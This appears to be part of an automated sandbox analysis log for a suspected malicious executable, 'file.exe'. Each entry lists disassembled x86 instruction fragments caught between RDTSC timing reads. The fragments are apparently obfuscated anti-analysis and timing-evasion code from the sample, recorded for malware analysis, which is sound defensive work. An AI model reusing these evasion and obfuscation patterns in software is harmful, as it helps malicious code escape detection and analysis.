Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F598 second address: 108F628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add cl, FFFFFFB6h 0x0000000e push 00000000h 0x00000010 add edi, 5EF8A986h 0x00000016 push 3D6B5E68h 0x0000001b push edx 0x0000001c ja 00007FBD38EF616Ch 0x00000022 pop edx 0x00000023 xor dword ptr [esp], 3D6B5EE8h 0x0000002a sub dword ptr [ebp+122D2A9Ah], ecx 0x00000030 push 00000003h 0x00000032 or dword ptr [ebp+122D1AACh], esi 0x00000038 push 00000000h 0x0000003a jo 00007FBD38EF616Ch 0x00000040 add esi, dword ptr [ebp+122D3842h] 0x00000046 push 00000003h 0x00000048 mov dl, 27h 0x0000004a push 992F358Ch 0x0000004f jmp 00007FBD38EF6171h 0x00000054 xor dword ptr [esp], 592F358Ch 0x0000005b jo 00007FBD38EF616Ah 0x00000061 push ebx 0x00000062 push ebx 0x00000063 pop edx 0x00000064 pop ecx 0x00000065 lea ebx, dword ptr [ebp+124513D6h] 0x0000006b mov edi, dword ptr [ebp+122D29E1h] 0x00000071 xchg eax, ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 jne 00007FBD38EF6166h 0x0000007b pushad 0x0000007c popad 0x0000007d popad 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F628 second address: 108F62E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F62E second address: 108F632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F775 second address: 108F779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F7B6 second address: 108F81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD38EF6175h 0x00000008 jmp 00007FBD38EF616Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FBD38EF6168h 0x00000018 pop edx 0x00000019 nop 0x0000001a pushad 0x0000001b mov di, dx 0x0000001e je 00007FBD38EF616Ch 0x00000024 popad 0x00000025 push 00000000h 0x00000027 pushad 0x00000028 sub ah, 0000000Eh 0x0000002b popad 0x0000002c call 00007FBD38EF6169h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FBD38EF6174h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F81F second address: 108F851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3971C787h 0x00000008 jmp 00007FBD3971C77Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108F851 second address: 108F898 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBD38EF616Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 jmp 00007FBD38EF616Ch 0x00000015 pop eax 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a jmp 00007FBD38EF6176h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F898 second address: 108F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F89E second address: 108F8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F8A3 second address: 108F8AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FBD3971C776h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E40A second address: 107E41F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD38EF6168h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E41F second address: 107E424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF1B4 second address: 10AF1BE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF615 second address: 10AF61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF761 second address: 10AF772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38EF616Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF8E8 second address: 10AF90C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C77Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBD3971C784h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF90C second address: 10AF911 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFE84 second address: 10AFE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFE8A second address: 10AFE9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFE9A second address: 10AFEB2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBD3971C776h 0x00000012 jne 00007FBD3971C776h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEB2 second address: 10AFEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4032 second address: 10A404B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3971C785h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A404B second address: 10A4056 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4056 second address: 10A4067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FBD3971C77Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4067 second address: 10A4079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FBD38EF616Ch 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B044E second address: 10B0453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0DEF second address: 10B0DFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FBD38EF6185h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084CDF second address: 1084CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084CE3 second address: 1084CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B79A1 second address: 10B79AB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B79AB second address: 10B79B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6339 second address: 10B6343 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6A9A second address: 10B6A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6A9F second address: 10B6AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jl 00007FBD3971C776h 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB5D7 second address: 10BB5FB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FBD38EF617Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA9EE second address: 10BAA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBD3971C77Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB2E9 second address: 10BB2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB46E second address: 10BB474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB474 second address: 10BB478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BB478 second address: 10BB493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007FBD3971C77Ch 0x0000000d jnc 00007FBD3971C776h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007FBD3971C776h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD163 second address: 10BD178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD178 second address: 10BD17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD17D second address: 10BD183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD183 second address: 10BD187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD187 second address: 10BD18B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC16 second address: 10BDC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC1C second address: 10BDC54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF616Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FBD38EF616Fh 0x00000011 xchg eax, ebx 0x00000012 push ecx 0x00000013 movzx edi, di 0x00000016 pop edi 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007FBD38EF616Ch 0x00000020 js 00007FBD38EF6166h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC54 second address: 10BDC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3971C77Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC63 second address: 10BDC85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDC85 second address: 10BDC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD21 second address: 10BDD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD25 second address: 10BDD29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDD29 second address: 10BDD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDE5 second address: 10BDDF6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDF6 second address: 10BDDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BDDFA second address: 10BDE13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE07A second address: 10BE07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE25A second address: 10BE264 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE264 second address: 10BE268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE2F3 second address: 10BE2F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE2F9 second address: 10BE2FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BE878 second address: 10BE87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF198 second address: 10BF1F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD38EF6178h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f jns 00007FBD38EF616Ch 0x00000015 mov esi, dword ptr [ebp+122D367Eh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FBD38EF6168h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov dword ptr [ebp+1247CD60h], eax 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF1F4 second address: 10BF1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF1FA second address: 10BF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BF1FF second address: 10BF204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C01A6 second address: 10C0245 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FBD38EF6168h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FBD38EF6168h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jmp 00007FBD38EF6179h 0x00000044 mov dword ptr [ebp+122D2C0Eh], edi 0x0000004a push 00000000h 0x0000004c mov esi, dword ptr [ebp+122D38CEh] 0x00000052 xchg eax, ebx 0x00000053 jo 00007FBD38EF6185h 0x00000059 pushad 0x0000005a jl 00007FBD38EF6166h 0x00000060 jmp 00007FBD38EF6177h 0x00000065 popad 0x00000066 push eax 0x00000067 pushad 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C149C second address: 10C14A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C201B second address: 10C2020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C14A0 second address: 10C14A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C667B second address: 10C6685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6948 second address: 10C694E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C78C6 second address: 10C78DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBD38EF616Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C78DE second address: 10C78E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C78E4 second address: 10C78E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB4F8 second address: 10CB502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBD3971C776h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA757 second address: 10CA75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB502 second address: 10CB506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB5C8 second address: 10CB5D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FBD38EF6166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CD8FE second address: 10CD903 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D088E second address: 10D08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD38EF616Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D1B1A second address: 10D1B24 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBD3971C77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D29EE second address: 10D29F8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBD38EF6166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0978 second address: 10D098A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBD3971C776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D4982 second address: 10D498D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBD38EF6166h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D098A second address: 10D098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D58A3 second address: 10D58D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBD38EF6174h 0x00000008 jmp 00007FBD38EF616Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jnp 00007FBD38EF616Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FBD38EF6166h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D39FF second address: 10D3A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FBD3971C778h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 cmc 0x00000024 push dword ptr fs:[00000000h] 0x0000002b and ebx, dword ptr [ebp+122D296Dh] 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov eax, dword ptr [ebp+122D15C9h] 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007FBD3971C778h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D38AAh] 0x0000005e xor dword ptr [ebp+122D1AF5h], ecx 0x00000064 push FFFFFFFFh 0x00000066 mov dword ptr [ebp+1247A58Fh], ecx 0x0000006c nop 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D098E second address: 10D09A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38EF6171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
